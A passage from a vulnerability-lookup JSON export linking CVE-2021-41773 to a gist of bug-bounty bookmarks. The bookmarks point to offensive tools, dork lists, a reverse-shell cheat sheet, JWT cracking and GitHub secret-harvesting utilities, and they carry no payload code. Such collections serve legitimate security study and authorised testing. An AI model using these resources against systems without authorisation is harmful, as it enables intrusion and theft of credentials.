"5cf17235-5870-4b43-b24a-ba76b0738a90", "vulnerability_lookup_origin": "caeb2787-0d58-4236-9039-7c86c3e566f3", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "exploited", "source": "https://vulnerability.circl.lu/known-exploited-vulnerabilities-catalog/25369a1f-b2dd-465d-8122-1d445773eaca", "content": "", "creation_timestamp": "2026-06-23T14:04:48.994679Z"}, {"uuid": "fa48180a-8002-4056-ad84-90c78a0a19ec", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2021-41773", "type": "seen", "source": "https://gist.github.com/morisono/78359e46c5369d24622657f014c7fa5d", "content": "                         \u2554\u2566\u2557\u2566 \u2566  \u2554\u2557 \u252c \u252c\u250c\u2500\u2510  \u2554\u2557 \u250c\u2500\u2510\u252c \u252c\u250c\u2510\u250c\u252c\u2510\u252c \u252c  \u2566\u2550\u2557\u250c\u2500\u2510\u250c\u2500\u2510\u250c\u2500\u2510\u252c \u252c\u252c\u2500\u2510\u250c\u2500\u2510\u250c\u2500\u2510\u250c\u2500\u2510\n                         \u2551\u2551\u2551\u255a\u2566\u255d  \u2560\u2569\u2557\u2502 \u2502\u2502 \u252c  \u2560\u2569\u2557\u2502 \u2502\u2502 \u2502\u2502\u2502\u2502\u2502 \u2514\u252c\u2518  \u2560\u2566\u255d\u251c\u2524 \u2514\u2500\u2510\u2502 \u2502\u2502 \u2502\u251c\u252c\u2518\u2502  \u251c\u2524 \u2514\u2500\u2510\n                         \u2569 \u2569 \u2569   \u255a\u2550\u255d\u2514\u2500\u2518\u2514\u2500\u2518  \u255a\u2550\u255d\u2514\u2500\u2518\u2514\u2500\u2518\u2518\u2514\u2518\u2534  \u2534   \u2569\u255a\u2550\u2514\u2500\u2518\u2514\u2500\u2518\u2514\u2500\u2518\u2514\u2500\u2518\u2534\u2514\u2500\u2514\u2500\u2518\u2514\u2500\u2518\u2514\u2500\u2518\n                                          \n                                           //\n                              ()==========&gt;&gt;======================================--\n                                           \\\\\n\n\n2FA Bypass\n  2fa bypass Mindmap https://www.mindmeister.com/1736437018?t=SEeZOmvt01 \n  2fa Bypass Methods https://workbook.securityboat.in/resources/web-app-pentest/business-logic-vulnerabilities/2fa-bypass\n\nAccount Takeovers\n  https://medium.com/@bathinivijaysimhareddy/tale-of-account-takeovers-part-2-9abf62de4ca3\n  https://kathan19.gitbook.io/howtohunt/subdomain-takeover/easy_methods\n\nAdminPanelFinder\n  \nadminphpfinder\nhttps://linux\nsecurity.expert/tools/admin-page-finder-php/\nAPI Security\n  https://www.cloudflare.com/learning/security/api/owasp-api-security-top-10/\n  Shadowe apis https://www.cloudflare.com/learning/access-management/what-is-shadow-it/\n  \nApi Keys\n  https://github.com/lanmaster53/recon-ng-marketplace/wiki/API-Keys\n\nAPI Hacking \nhttps://github.com/microsoft/restler-fuzzer\nhttps://github.com/hAPI-hacker/Hacking-APIs/fork\n\nAmass\n  https://securityweekly.com/wp-content/uploads/2021/05/AmassTechSegment-0.pdf\n\nAmass Scripting\\\nhttps://github.com/OWASP/Amass/tree/master/resources/scripts\nhttps://github.com/OWASP/Amass/blob/master/doc/scripting.md\namass scripting https://youtu.be/H1wdBgY1rtg?t=4987\n\n  Bug Bounty for Beginners Stream#4:AMASS, Subfinder, FFUF  https://www.youtube.com/watch?v=27zMfcr2fPE\n  https://hackbotone.com/blog/amass-osint-reconnaissance-tool/ \n  https://hakluke.medium.com/haklukes-guide-to-amass-how-to-use-amass-more-effectively-for-bug-bounties-7c37570b83f7\n  https://securityonline.info/amass-subdomain-enumeration/\n  https://github.com/OWASP/Amass/releases\n\nhttps://twitter.com/jeff_foley\n\nhttps://github.com/OWASP/Amass/blob/master/doc/scripting.md\nhttps://github.com/OWASP/Amass\nhttps://gist.github.com/sillydadddy/b1726c8e8ce281d55b82d4e2a1a610e8\nhttps://twitter.com/dokkillo/status/1305566849514471424\nhttps://github.com/PatrikFehrenbach/amass-tools/blob/master/assetfinder.ads\nhttps://github.com/OWASP/Amass#top-mentions\namass enum script command https://youtu.be/H1wdBgY1rtg?t=5408\nExample of api key configuration https://www.hahwul.com/2020/09/23/amass-go-deep-in-the-sea-with-free-apis/#chaos\n[31:33 / 1:56:06]\n[How to Use Amass Efficiently by @jeff_foley #NahamCon2020](https://youtu.be/H1wdBgY1rtg?t=1974)\n[OWASP AMass Boot Camp by Jeff Foley (Caffix)](https://www.youtube.com/watch?v=OOurkCPf2-I) \nAmass Tutorial https://github.com/OWASP/Amass/blob/master/doc/tutorial.md\nhttps://github.com/vortexau/dnsvalidator\nhttps://twitter.com/owaspamass\n\nAndroid\n  https://github.com/dzmitry-savitski/android-pentest-tool\n\nAngularJS\n  https://github.com/snoopysecurity/Public/blob/master/Old%20Presentations/MWRICON%202018/README.md\n  \nAuthentication Bypass Vulnerabilities\n\nAscii \n  https://github.com/heldersepu/hs-scripts/blob/master/ascii.txt\nAsset Monitoring  \n  https://github.com/ruevaughn/assetnote\n  https://github.com/yeswehack/pwn-machine\n  https://github.com/robre/jsmon\n\nAPI Hacking\n  https://github.com/Excloudx6/31-days-of-API-Security-Tips\n  https://gist.github.com/ruevaughn/51048bccdc753596443eca95cbf39356\n  https://apexvicky.medium.com/top-10-api-bugs-where-to-find-them-5dac338b3d73\n  https://attacker-codeninja.github.io/2021-08-28-Hacking-APIs-notes-from-bug-bounty-bootcamp/\n  https://dfir.blog/unfurl/\n  https://www.slideshare.net/programmableweb/why-api-security-is-more-complicated-than-you-think-and-why-its-your-1-priority\n  \nAmazon Cognito\nhttps://docs.aws.amazon.com/cognito-user-identity-pools/latest/APIReference/API_InitiateAuth.html\nhttps://docs.aws.amazon.com/cognito-user-identity-pools/latest/APIReference/CommonParameters.html\n  https://docs.aws.amazon.com/cognito/latest/developerguide/cognito-dg.pdf \n  https://docs.aws.amazon.com/cognito-user-identity-pools/latest/APIReference/API_GetUser.html\n  https://github.com/RhinoSecurityLabs/Security-Research/blob/master/tools/aws-pentest-tools/iam_user_enum/default-word-list.txt\n\nBlockchain\n  https://hash.ai/@b/uniswap\n  https://medium.com/immunefi/hacking-the-blockchain-an-ultimate-guide-4f34b33c6e8b\n  https://github.com/ruby/webrick/blob/master/lib/webrick/httprequest.rb }9\n  https://twitter.com/0xAsm0d3us/status/1438149310080712709 cdC\n\n\nBlogs\n  https://respectxss.blogspot.com/\n\nBrowsers\n  Save multiple pages as a single html page https://github.com/gildas-lormeau/SingleFile\n  https://bughacking.com/best-browsers-for-hackers/\n  https://hackaday.com/2022/01/17/hack-the-web-without-a-browser/\n  https://woob.tech/\n  https://github.com/moonD4rk/HackBrowserData\n  https://resources.infosecinstitute.com/topic/ethical-hacking-top-10-browser-extensions-for-hacking/\n  https://github.com/Excloudx6/browser-compat-data\n  https://httpwg.org/specs/rfc7230.html#header.transfer-encoding\n  https://developer.mozilla.org/en-US/docs/Glossary/Forbidden_header_name\n  https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Length\n  https://stackoverflow.com/questions/978061/http-get-with-request-body?rq=1\n  https://datatracker.ietf.org/doc/html/rfc7230\n  https://groups.yahoo.com/neo/groups/rest-discuss/conversations/messages/9962\n  https://www.ietf.org/rfc/rfc2119.txt\n  https://www.elastic.co/guide/en/elasticsearch/guide/current/_empty_search.html\n  https://www.concise-courses.com/hacking-tools/web-browser-related-tools/\n  \nEthereum Hacking\nhttps://github.com/NafisiAslH/KnowledgeSharing\nhttps://github.com/SecurityInnovation/Smart-Contract-CTF\n https://twitter.com/CyberWarship/sta tus/1533710785914056705\n https://github.com/heldersepu/hs-scripts/blob/master/NodeJS/web3/VestingERC20.js\n \nBroken Access Control - https://cwe.mitre.org/data/definitions/1345.html\nBusines Logic\nhttps://shahmeeramir.com/breaking-the-web-with-logics-ce22e8a9c4e2\nBrowser Extensions - Chrome\n  Collusion - https://chrome.google.com/webstore/search/collusion\n  DotGit - https://chrome.google.com/webstore/detail/dotgit/pampamgoihgcedonnphgehgondkhikel?hl=en\n  Trufflehog https://chrome.google.com/webstore/detail/trufflehog/bafhdnhjnlcdbjcdcnafhdcphhnfnhjc\n  Tracy - https://github.com/nccgroup/tracy/wiki/Example-Workflows\n  \nBrowser Extensions - Firefox\n  Cookie Editor - https://addons.mozilla.org/en-US/firefox/addon/cookie-editor/\n  Bulk URL Opener - https://addons.mozilla.org/en-GB/firefox/addon/bulkurlopener/\n  Hacktoolshttps://addons.mozilla.org/en-US/firefox/addon/hacktools/\n  Tracy https://github.com/nccgroup/tracy/wiki/Example-Workflows\n\nBug Bounty Programs\n  https://blog.bugzero.io/bug-zero-is-going-to-pay-your-security-bill-for-2022-4b6396e2ee48\n  Bulk Load Programs https://gist.github.com/brevityinmotion/b86f7475d4cd2790003326a4d3a528ba\n  Google Acquisitions   https://opensourcelibs.com/lib/google-acquisitions\n  https://github.com/The-Art-of-Hacking/h4cker/tree/master/bug-bounties#bug-bounty-platforms\n  Discovery Header DoD - https://github.com/KingOfBugbounty/Discovery-Header-Bug-Bounty\n  King Recon DoD - https://github.com/KingOfBugbounty/KingRecon_DOD\n  Bentley Bug Bounty Program - https://www.bentley.com/en/products\n  https://lostsoulofawolf.medium.com/bug-bounty-how-to-get-private-invites-60062a5d0809\n  https://github.com/Hack-with-Github\n  Shopify\n    https://www.hulkapps.com/\n  BBP (Bug Bounty Programs!)\n  https://github.com/Excloudx6/KingRecon_DOD\n  https://github.com/bughunterlabs/open-bounty-targets/blob/main/dorks.txt\n  https://jsfiddle.net/ruevaughn/2mnq5vgf/9/\n  https://github.com/detectify/cs-challenge\n  https://github.com/projectdiscovery/public-bugbounty-programs\n  https://app.intigriti.com/programs/redbull/redbull/detailhttps://gist.github.com/ruevaughn/a365c7100f8dce26e550e2e3e239e138\n  https://huntr.dev/\n  https://gist.github.com/ruevaughn/a365c7100f8dce26e550e2e3e239e138\n  https://support.google.com/websearch/answer/2466433?hl=en\n  Dutch Gov - bug bounty scope https://gist.github.com/ruevaughn/f2d1157598a6156c3d51538b3fbd980c\n  https://gist.github.com/haxcited/e684df7f9ec210867d25f7ccac22c1d5\n  https://github.com/B3nac/Android-Reports-and-Resources\n  https://hackerone.com/alipay?type=team\n  https://render.alipay.com/p/c/183ecyeztvuo/dana-pay.html\n  https://github.com/The-Art-of-Hacking/h4cker  \n  Disclosure Assistance w/ Hackerone https://hackerone.com/disclosure-assistance/disclosure_assistance_requests/new?type=team\n  Disclose.io - program List Data](https://raw.githubusercontent.com/disclose/diodb/master/program-list.json)\n  Open Bug Bounty - openbugbounty.com\n\nBurp Collaborator ALternatives\n  https://github.com/anshumanbh/terraform-burp-collaborator\nhttps://honoki.net/2021/07/11/wilson-cloud-respwnder/\n  https://github.com/honoki/wilson-cloud-respwnder\n  Interactsh\n    https://github.com/4ARMED/interactsh\nBlogs\n  https://www.veracode.com/blog?utm_source=lpFooter&amp;utm_medium=Website\n  http://10degres.net/posts/\n  https://www.secureideas.com/blog\n  \nBrute Forcing\n  Brutesubs\n    https://github.com/anshumanbh/brutesubs\n      https://github.com/anshumanbh/brutesubs/compare/master...exploitprotocol:brutesubs:master\n      https://github.com/APTreat/brutesubs\n      https://github.com/janmasarik/brutesubs\n      https://github.com/RyanLongVA/brutesubs\n     \nChaining Vulnerabilites\n   2022-style OAuth account takeover on Facebook - $45,000 bug bounty  https://www.youtube.com/watch?v=pk7oYuz4x0Q\n  \nCertificate Transparancy\nhttps://github.com/anshumanbh/terraform-burp-collaborator#using-a-proper-tls-certificate/\nhttps://www.rfc-editor.org/rfc/rfc5280#section-4.2.1.12\n   Attack Surface Management Series - EP1 - Certificate Transparency (In under 10 mins) - https://www.youtube.com/ watch?v=MGQ1GqmixY0\n\nCanaryTokens\nhttps://canarytokens.org/generate\n\nCerticiates\n  https://github.com/Echocipher/HackeroneSpider\nChecklists\n\nCheatsheet\nhttps://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet\nhttps://github.com/dgtlmoon/changedetection.io\n#### CVE\n\nCode Review\nhttps://www.youtube.com/watch?v=q5NqY2RRLj0\nhttps://www.youtube.com/watch?v=bfLQjZmD5jY&amp;feature=youtu.be\n\nCookie \nCSRF Tokens\n  https://www.veracode.com/security/csrf-token\n  \nCors\n  csors https://chawdamrunal.medium.com/insecure-cors-configuration-808437d7cfd7\n  python cors_scan.py -u example.com -p http://127.0.0.1:8080 # To use socks5 proxy, install PySocks with pip install \n  https://jakearchibald.com/2021/cors/playground/\n  \nCSP https://www.keycdn.com/support/content-security-policy  \nhttps://www.bloggersideas.com/cspisawesome/\nhttps://content-security-policy.com/\n\nCourses \n  https://web.stanford.edu/class/cs253/\n  Nehamsec Udemy Course https://www.udemy.com/course/intro-to-bug-bounty-by-nahamsec/\n  \nCharacter Encodings\nhttps://stat545.com/character-encoding.html\n\nCharles Proxy\n  Use Charles Proxy to Reverse Engiener an IOS App https://www.youtube.com/watch?v=cvvPLlP4518&amp;feature=emb_logo\n\nChecklists \n  https://pentestbook.six2dez.com/others/web-checklist\n  https://github.com/zactly/handouts/blob/master/generic_checks.md\n  https://linuxsecurity.expert/checklists/\n  https://apexvicky.medium.com/bug-bounty-methodology-web-vulnerabilities-checklist-86175dd29987\n  https://github.com/zactly/handouts/blob/master/example_template.md\n  https://github.com/zactly/handouts/blob/master/conferences/locomocosec22/notes.md \n  https://github.com/AnLoMinus/Bug-Bounty/tree/main/Checklist/Web%20App\n  https://github.com/security-checklist/php-security-check-list\n  https://apexvicky.medium.com/bug-bounty-methodology-web-vulnerabilities-checklist-86175dd29987\n\nCheckout \n  https://0day.hu/\n\nCheatsheets\n  https://pentester.land/cheatsheets\n  https://pentester.land/cheatsheets/2019/03/25/compilation-of-recon-workflows.html\n  https://pentester.land/cheatsheets/2019/04/15/recon-resources.html\n  https://pentester.land/cheatsheets/2018/11/02/open-redirect-cheatsheet.html\n  \n  https://securityzines.com/#comics \n  https://github.com/EdOverflow/bugbounty-cheatsheet\n  https://m0chan.github.io/2019/12/17/Bug-Bounty-Cheetsheet.html\n  \nCloud Hacking \n  https://github.com/janmasarik/generate-bucketnames\n  https://github.com/janmasarik/GCPBucketBrute\n  https://github.com/avicoder/notes/tree/master/Cloud\n  https://github.com/avicoder/notes\n  Pwned Cloud Society pdf https://www.slideshare.net/BryceKunz/pwned-cloud-society-bsidesslc-2017?from_action=save\n  Cloud Hacking  https://www.youtube.com/watch?v=ITSZ8743MUk\n  https://www.cloudvulndb.org/\nhttps://github.com/jordanpotti/CloudScraper \nhttps://github.com/appsecco/spaces-finder\n\nCode Review\n  https://raw.githubusercontent.com/zactly/handouts/master/Practical%20Secure%20Code%20Review%20-%20Whitepaper.pdf\n\nCodeql\n\nCookies\n  https://datatracker.ietf.org/doc/html/rfc6265#section-5.3w\n  https://github.com/jshttp/cookie\n\nCryptography\n  http://www.math.sci.hiroshima-u.ac.jp/m-mat/MT/ARTICLES/earticles.html#sfmt\n\nCTFs\nhttps://github.com/SecurityInnovation/Smart-Contract-CTF\n  Stripe ctf https://gist.github.com/evandrix/1901352\n  \nCWE \n  CWE-548: Exposure of Information Through Directory Listing -  https://cwe.mitre.org/data/definitions/548.html\n\n  Default creds \n    https://github.com/Viralmaniar/Passhunt\nDirectory Listing\n  Konan branch ofDeepsearch  https://github.com/rkreddypandu/Konan\n  deepsearch https://github.com/prosecurity/DeepSearch\n  Dirb  https://techyrick.com/dirb/\n  http://www.tecapi.com/public/rvr-view-attack-vector-gui.jsp?antiCsrfToken=null&amp;attackVectorId=254 \n  http://projects.webappsec.org/w/page/13246922/Directory%20Indexing\n\nDjango \n  https://blog.sonarsource.com/disclosing-information-with-a-side-channel-in-django/?utm_source=twitter&amp;utm_medium=social&amp;utm_campaign=djangodictsort&amp;utm_content=security&amp;utm_term=mofu\n  \ndns Rebinding \n  https://bugs.chromium.org/p/project-zero/issues/detail?id=1524\n  https://portswigger.net/research/so-you-want-to-be-a-web-security-researcher#forgottenknowledge\n\nDorks\n  https://github.com/random-robbie/bugbountydork/fork\n  Aline - Dork Automator CLI - https://github.com/ferreiraklet/Aline\n  Brtwitter dork: https://mobile.twitter.com/i/events/1417062625997991936\n  https://www.infosecmatter.com/bug-bounty-tips-1/#5-top-25-open-redirect-dorks\n  Shifa123 BugBounty Dorks https://github.com/shifa123/bugbountyDorks/blob/master/bbdorks\n  Goop https://github.com/s0md3v/goop\n  Go-Dork \n    https://github.com/dwisiswant0/go-dork\n    https://github.com/dwisiswant0/go-dork/compare/master...babaloveyou:go-dork:master\n  https://bxmbn.medium.com/ultimate-tips-and-tricks-to-find-more-cross-site-scripting-vulnerabilities-d2913765e2d5\n  Open Bug Bounty Targets https://github.com/bughunterlabs/open-bounty-targets/blob/main/dorks.txt\n  uDork https://github.com/m3n0sd0n4ld/uDork\n  \nffuf\n  How to Ffuf https://www.bugcrowd.com/blog/how-to-ffuf-with-codingo/\n  How to use ffuf - Hacker Toolbox https://www.youtube.com/watch?v=aN3Nayvd7FU\n  Fuzzing / FFUF -&gt; 5-30-22 Nehamssec stream covered fuzzing A LOT https://www.twitch.tv/videos/1312499916\n  Protips ffuf - tips and tricks https://www.youtube.com/watch?v=uwcRBSUl8e4&amp;t=358s\n  Late to the party, or, in other words massive web enumeration using ffuf. http://0entropy.blogspot.com/2020/05/late-to-party-or-in-other-words-massive.html\n  https://gowthams.gitbook.io/bughunter-handbook/fuzzing-fuff\n  https://0xmahmoudjo0.medium.com/how-i-found-multiple-sql-injection-with-ffuf-and-sqlmap-in-a-few-minutes-9c3bb3780e8f\n \n Fingerprinting\n   Fingerpint JS https://github.com/fingerprintjs/fingerprintjs\n   Whatweb\n   Wappalyze\n   Webanalyze\n   \nFrameworks\n  axiom \n    https://github.com/pry0cc/axiom\n    https://github.com/pry0cc/axiom/blob/master/images/provisioners/default.json\n  BBRF Client - https://github.com/honoki/bbrf-client\n  BugBounty Toolkit - Hackersploit Framework - https://github.com/AlexisAhmed/BugBountyToolkit\n  Findomain https://github.com/Findomain/Findomain\n  Hive https://hexway.io/blog/new-update-hive/\n  Intrigue \n    https://core.intrigue.io/\n    https://core.intrigue.io/getting-started/\n  LazyRecon - https://github.com/nahamsec/lazyrecon\n  Mandiant - Web GUI Take decisive action with industry-leading intelligence  https://www.mandiant.com\n  MooseDojo - apt2 - Pentesters Framework nmap centered \n    apt2 https://buaq.net/go-249.html  \n    apt2 MooseDojo/apt2: automated penetration toolkit   \n\n  Nerve \n    https://github.com/PaytmLabs/nerve\n  Osmedeus \n    https://docs.osmedeus.org/workflow/default-workflow/\n    https://github.com/j3ssie/osmedeus \n    https://xploitlab.com/osmedeus-the-most-complete-reconnaissance-tool-and-vulnerability-scanning/\n    https://docs.osmedeus.org/web-ui/ \n    https://github.com/osmedeus/osmedeus-workflow/blob/main/general/subdomain.yaml \n    https://discord.com/invite/mtQG2FQsYA \n    https://docs.osmedeus.org/installation/practical-usage\n    https://docs.osmedeus.org/workflow/\n  Pwn Machine https://github.com/yeswehack/pwn-machine  \n  \n  ReconFTW - https://github.com/six2dez/reconftw\n  Recon NG\n    https://github.com/anshumanbh/domain\n    https://raw.githubusercontent.com/anshumanbh/domain/master/enumall.py\n    Github https://github.com/lanmaster53/recon-ng \n    Welcome to the Recon-ng Marketplace https://github.com/lanmaster53/recon-ng-marketplace\n    API Key list   https://github.com/lanmaster53/recon-ng-marketplace/wiki/API-Keys\n    Setup script for Regon-ng  and altdns https://github.com/jhaddix/domain\n  Reconness - https://github.com/reconness/reconness\n  Rengine - \n    https://github.com/yogeshojha/rengine\n    https://github.com/yogeshojha/rengine/commit/cf30e98e0440424019cb2cad600892ce405f850e\n    Default Config Engine Yaml file https://raw.githubusercontent.com/yogeshojha/rengine/master/default_yaml_config.yaml\n  Sniper - https://github.com/1N3/Sn1per\n  TIDoS Framework https://github.com/0xInfection/TIDoS-Framework\n  Trickest https://www.youtube.com/watch?v=fXwWinE0sSg\n  Vajra - https://github.com/r3curs1v3-pr0xy/vajra\n  WebhackerWeapons https://github.com/hahwul/WebHackersWeapons\n\nFreq\n  Removes unnecesary output and only outputs happy (for us) path https://github.com/takshal/freq/compare/main...dmonteirosouza:freq:main\n  Fork by Realgoose. Adds a User-Agent bxss as well as robots.txt sprayer check https://github.com/takshal/freq/compare/main...RealGoose:freq:main\n  Removed unnecesary output https://github.com/takshal/freq/compare/main...dmonteirosouza:freq:main\n  Fork by kg11102 KaioGomes. Adds User-Agent firefox and Referrer Header check. Changes alert check. Ignored expired SSL Cert (Probably to skip errors) https://github.com/takshal/freq/compare/main...kg1102:freq:main\n  \n  \nGatsby\nhttps://www.gatsbyjs.com/docs/conceptual/security-in-gatsby/#key-security\nhttps://www.gatsbyjs.com/blog/2019-04-06-security-for-modern-web-frameworks/\n\nGit/Source Code Secret Finding\nhttps://github.com/auth0/repo-supervisor\nhttps://blog.gitleaks.io/finding-secrets-with-regular-expressions-d90493bb3784\n  https://docs.github.com/en/code-security/secret-scanning/about-secret-scanning \n  https://github.com/takshal/Git-Finder \n  https://tillsongalloway.com/finding-sensitive-information-on-github/\n  https://secapps.com/tutorials/github-gist-recon\n  http://10degres.net/github-tools-collection/\n  https:// docs.github.com/en/rest/search\n  git-all-secrets\n    https://github.com/mhmdiaa/git-all-secrets\n    https://github.com/anshumanbh/git-all-secrets\n  https://www.ndss-symposium.org/wp-content/uploads/2019/02/ndss2019_04B-3_Meli_paper.pdf\n  https://github.com/koto/gitpillage\n  https://github.com/hisxo/gitGraber\n  https://github.com/gwen001/github-search\n  https://github.com/darkseed/gitpillage\n  Tools to Get sensitive info / secrets from https://twitter.com/soaj1664ashar/status/1176769454035939328\n  https://github.com/trufflesecurity/trufflehog\n  Why Exposed API Keys and Sensitive Data are Growing Cause for Concern https://www.programmableweb.com/news/why-exposed-api-keys-and-sensitive-data-are-growing-cause-concern/analysis/2015/01/05\n  Secret Hunting - Google Dorks, Git Dorks, Employee OSINT, etc\n  https://gist.github.com/markofu/549fbd287edf08c38e869dacc740e49de\n  https://github.com/aquasecurity/cloudsploit  \n  Trufflehog https://www.youtube.com/watch?v=aioheMi1Wko\n  https://sapt.medium.com/perform-information-gathering-using-following-tools-on-the-given-targets-cyber-sapiens-internship-12c858166008\n  +Github Wiki Auditor https://www.smeegesec.com/2019/03/auditing-github-repo-wikis-for-fun-and.html\n  https://github.com/SmeegeSec/GitHub-Wiki-Auditor \n  https://www.kitploit.com/2022/04/gitbleedtools-for-extracting-data-from.html\n  https://github.com/phlmox/jslinkfinderv2\n  https://exposingtheinvisible.org/guides/google-dorking/ &lt;---- huge dorking guide!\n  https://github.com/phlmox/bingdork\n  \n  Git-Secrets\n   Adds supports for scanning aws, gcp, ads a gf regex pattern,   https://github.com/awslabs/git-secrets/compare/master...deshpandetanmay:git-secrets:master\n  Adds support for scaning entire drive, concept of install.uninstall, a global config file and a regex patterns file (nice!) https://github.com/awslabs/git-secrets/compare/master...dbrs:git-secrets:master\n  He adds one pattern to replace all the previous ones, and it adds a curl request. Other various changes. https://github.com/awslabs/git-secrets/compare/master...konakonall:git-secrets:master\n  \n  \n  https://github.com/toniblyx/my-arsenal-of-aws-security-tools\n  https://techvomit.net/aws-security/\n  https://github.com/gwen001/s3-bucketsdfinder.git\n  https://github.com/janmasarik/bucketsperm\n  https://github.com/phlmox/gdork\n  https://github.com/lc/secretz\n   https://github.com/kevthehermit/PasteHunter\n\ngitdump (TODO Take Notes and Implement from John Hammon Stream)\nhttps://github.com/topics/crawl?o=desc&amp;s=updated\n\nGraphql\n  https://github.com/IvanGoncharov/graphql-voyager\n  https://github.com/Escape-Technologies/graphinder\n  https://github.com/gsmith257-cyber/GraphCrawler\n  Learn Graphql https://www.gatsbyjs.com/docs/conceptual/graphql-concepts/\n  That single GraphQL issue that you keep missing https://blog.doyensec.com/2021/05/20/graphql-csrf.html\n  https://blog.assetnote.io/2021/08/29/exploiting-graphql/\n  https://twitter.com/holybugx/status/1441460070387261440?s=21\n  https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/GraphQL%20Injection\n  https://www.programmableweb.com/news/what-graphql-and-how-did-it-evolve-rest-and-other-api-technologies/analysis/2019/07/31\n  https://github.com/KathanP19/HowToHunt/blob/master/GraphQL/GraphQL.md\n  https://swizec.com/blog/reverse-engineer-a-graphql-api-to-automate-love-notes-codewithswiz-24/\n  https://www.youtube.com/watch?v=cvvPLlP4518&amp;feature=emb_logo\n  Graphwoof https://github.com/dolevf/graphw00f\n  Graphql Voyager https://ivangoncharov.github.io/graphql-voyager/\n  inQL graphql Burp Extension for burp [here](https://youtu.be/5qSq1S2sRC8?t=753)\n  \nGithubs \n    https://github.com/bbhunter\n\nHandson / Demos\nhttps://github.com/yandex/securitygym\n  aws test challenge http://flaws.cloud/\n  ABUH! https://darkrebel.net/metarget-framework-providing-automatic-consctions-of-vulnerable-infrastructures | metarget appv install dvwa | metarget install  cve-2021-2312\n  xss jigsaw - https://blog.innerht.ml/page/2/\n  https://google-gruyere.appspot.com/\n  https://hackxor.net/\n  https://github.com/takshal/FOR-FUN\n  Vulnrable Task Manger app https://github.com/redpointsec/vtm\nHacking Tools\n  https://reqbin.com\n  https://gist.github.com/bgoonz/524b4ea887b216b810d16429265a34a3\nHTTP\n  HTTP Pipelining in burp https://youtu.be/boHIjDHGmIo?t=204)\n\nHTTP Parameer Pollution \n  HPP  https://www.youtube.com/watch?v=QVZBl8yxVX0&amp;t=13s\n  \nHTTP Request Smuggling\n\nHTTP Security Headers https://blog.detectify.com/2019/02/05/guide-http-security-headers-for-better-web-browser-security/\nHTTP HEader Smuggling https://github.security.telekom.com/2020/05/smuggling-http-headers-through-reverse-proxies.html\nhttp headers  https://www.ibm.com/docs/en/ibm-mq/7.5?topic=headers-content-type-http-entity-header\n   \nRequest Smuggling\nhttps://github.com/ruevaughn/websocket-connection-smuggler\nhttps://portswigger.net/daily-swig/how-to-perform-an-http-header-smuggling-attack-through-a-reverse-proxy\nhttps://twitter.com/albinowax/status/1263122811683553283\nNote: kitploit guys is the hackbogtone guy\nhttps://www.kitploit.com/2021/08/http-request-smuggling-http-request.html\nhttps://hackbotone.com/blog/http-request-smuggling-detection-tool/\nhttps://www.youtube.com/watch?v=mijOcGLneLU&amp;t=303.658823s\n  Defparam Variant      - https://gist.github.com/defparam/840f7d9e31f77b3c5460c5921e0787ef/revisions\n  bbhunter mutations    - https://gist.github.com/bbhunter\n HTTP Request Smuggling - https://gist.github.com/ruevaughn/9c76260b412446f33b647c970bbb1001)\n\nHTTP Request Smuggling Tools\n  https://github.com/Sh1Yo/request_smuggler\n  \nIDOR\n  https://medium.com/pentesternepal/access-control-worth-2000-everyone-missed-this-idor-access-control-between-two-admins-9745eaf15d21\n  \nISS=\n\niis https://www.rapid7.com/db/vulnerabilities/spider-asp-dot-net-trace-axd/\n\n\nIos\n  https://medium.com/pentesternepal/access-control-worth-2000-everyone-missed-this-idor-access-control-between-two-admins-9745eaf15d21\n  https://havoc.app/package/crane\n  \n\nInsecure Deserialisation\nInsecure Deserialisation https://www.youtube.com/watch?v=SNi7gNkfLSM\n\nIP (INternet Protocol) https://youtu.be/C7CpfL1p6y0?t=320 \n                        \n\nJavascript\n  \ud83d\udd75\ufe0f Pinkerton is an JavaScript file crawler and secret finder developed in Python  https://github.com/oppsec/Pinkerton\n  Looking through javascript files live hacking https://youtu.be/xx5fF7i-dCQ?t=2582\n  https://www.bugbountyhunter.com/guides/?type=javascript_files\n  JAVASCRIPTRECON.md https://gist.github.com/m4ll0k/31ce0505270e0a022410a50c8b6311ff\n  https://portswigger.net/research/dom-based-angularjs-sandbox-escapes\n  Javascript for hackers https://www.youtube.com/watch?v=FTeE3OrTNoA\n  https://legallybreaking.com/discussion/88/full-featured-javascript-recon-automation-jsfscan-sh\n  https://labs.detectify.com/2016/12/08/the-pitfalls-of-postmessage/  \n  Javascript Enumeration https://www.youtube.com/watch?v=IsSWbVHk11M\n  https://cheatsheetseries.owasp.org/cheatsheets/Third_Party_Javascript_Management_Cheat_Sheet.html\n  unminifier http://dean.edwards.name/my/\n\n\n  https://github.com/robre/scripthunter\n\nJSON Attacks - JSON https://www.youtube.com/watch?v=oUAeWhW5b8c\n\nJWT\n  https://gist.github.com/ruevaughn/328067fadf926ddb788f98cd0d2d1a71 Crack JWT\n  https://medium.com/redteam/stealing-jwts-in-localstorage-via-xss-6048d91378a0\n  Security Weekly Unlocked: https://www.youtube.com/playlist?list=PLlPkFwQHxYE7nQtKNzjnsVyoSOu2K4l9e\n  https://anil-pace.medium.com/json-web-tokens-vs-oauth-2-0-85dd0b32057d\n  https://www.youtube.com/watch?v=muYmiEtPL8U JWT with bbking\n  JWT Traversal https://github.com/MoisesTapia/JwtTransversal\n\nMd5 \n  https://github.com/juuso/BozoCrack\n  \nMeg\n  https://github.com/blackhatethicalhacking/meg/compare/master...tomnomnom:meg:master\n  https://github.com/tomnomnom/meg/compare/master...3lpsy:megurl:master\n  https://github.com/tomnomnom/meg/compare/master...Cgboal:meg:master\n  https://github.com/tomnomnom/meg/compare/master...1ndianl33t:meg:master\n  https://github.com/tomnomnom/meg/compare/master...GwynHannay:meg:master\n  \nMethodologies (Hackers)\n   Cyberheartmi Methodology   https://gist.github.com/cyberheartmi9/1ac77d171d9b9dc9a5be45fa4f4c8dcb\n   Bug Bounty Mini Course:Automated Recon  https://www.youtube.com/watch?v=0VOWgM4klpM&amp;list=WL&amp;index=19&amp;t=53s\n   Zseanos Methodology https://www.bugbountyhunter.com/methodology/zseanos-methodology.pdf\n \n \nMime Type Sniffing\nhttps://www.keycdn.com/support/what-is-mime-sniffing\n\nMindmaps \n  List of Attack Vectors 